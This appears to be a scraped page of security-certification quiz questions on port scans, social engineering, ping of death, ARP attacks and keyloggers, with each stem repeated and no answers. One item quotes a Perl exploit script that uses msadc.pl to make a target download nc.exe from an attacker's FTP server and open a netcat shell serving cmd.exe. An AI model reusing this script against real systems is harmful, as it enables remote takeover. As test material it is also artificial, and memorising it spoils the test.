What type of port scan is shown below?
What type of port scan is shown below?
Scan directed at open port:
ClientServer
5.2.92:4079 ———FIN———>192.5.2.110:23
5.2.92:4079 <—-NO RESPONSE——192.5.2.110:23
Scan directed at closed port:
ClientServer
5.2.92:4079 ———FIN———>192.5.2.110:23
5.2.92:4079<—–RST/ACK———-192.5.2.110:23
How much information will Clive be able to get from the client before commencing his test?
Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get from the client before commencing his test?
What is the name of this library?
Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform you must install a packet capture library. What is the name of this library?
How would you describe Jason's behavior within a security context?
Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason’s behavior within a security context?
From the information given, what type of attack is Bryce attempting to perform?
Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is Bryce attempting to perform?
What is this attack most appropriately called?
Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called?
What is the destination MAC address of a broadcast frame?
John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?
What is the expected result of the following exploit?
What is the expected result of the following exploit?
################################################################# $port = 53;# Spawn cmd.exe on port X
$your = “192.168.1.1”;# Your FTP Server
$user = “Anonymous”;# login as
$pass = ‘noone@nowhere.com’;# password
################################################################# $host = $ARGV[0];
print “Starting …n”;
print “Server will download the file nc.exe from $your FTP server.n”;
system(“perl msadc.pl -h $host -C “echo open $your >sasfile””);
system(“perl msadc.pl -h $host -C “echo $user>>sasfile””);
system(“perl msadc.pl -h $host -C “echo $pass>>sasfile””);
system(“perl msadc.pl -h $host -C “echo bin>>sasfile””);
system(“perl msadc.pl -h $host -C “echo get nc.exe>>sasfile””);
system(“perl msadc.pl -h $host -C “echo get hacked.html>>sasfile””);
system(“perl msadc.pl -h $host -C “echo quit>>sasfile””);
print “Server is downloading …n”;
system(“perl msadc.pl -h $host -C “ftp -s:sasfile””);
print “Press ENTER when download is finished … (That’s why it’s good to have your own ftp server)n”;
$o=; print “Opening …n”;
system(“perl msadc.pl -h $host -C “nc -l -p $port -e cmd.exe””);
print “Done.n”;
#system(“telnet $host $port”); exit(0);
ARP poisoning is achieved in _____ steps
ARP poisoning is achieved in _____ steps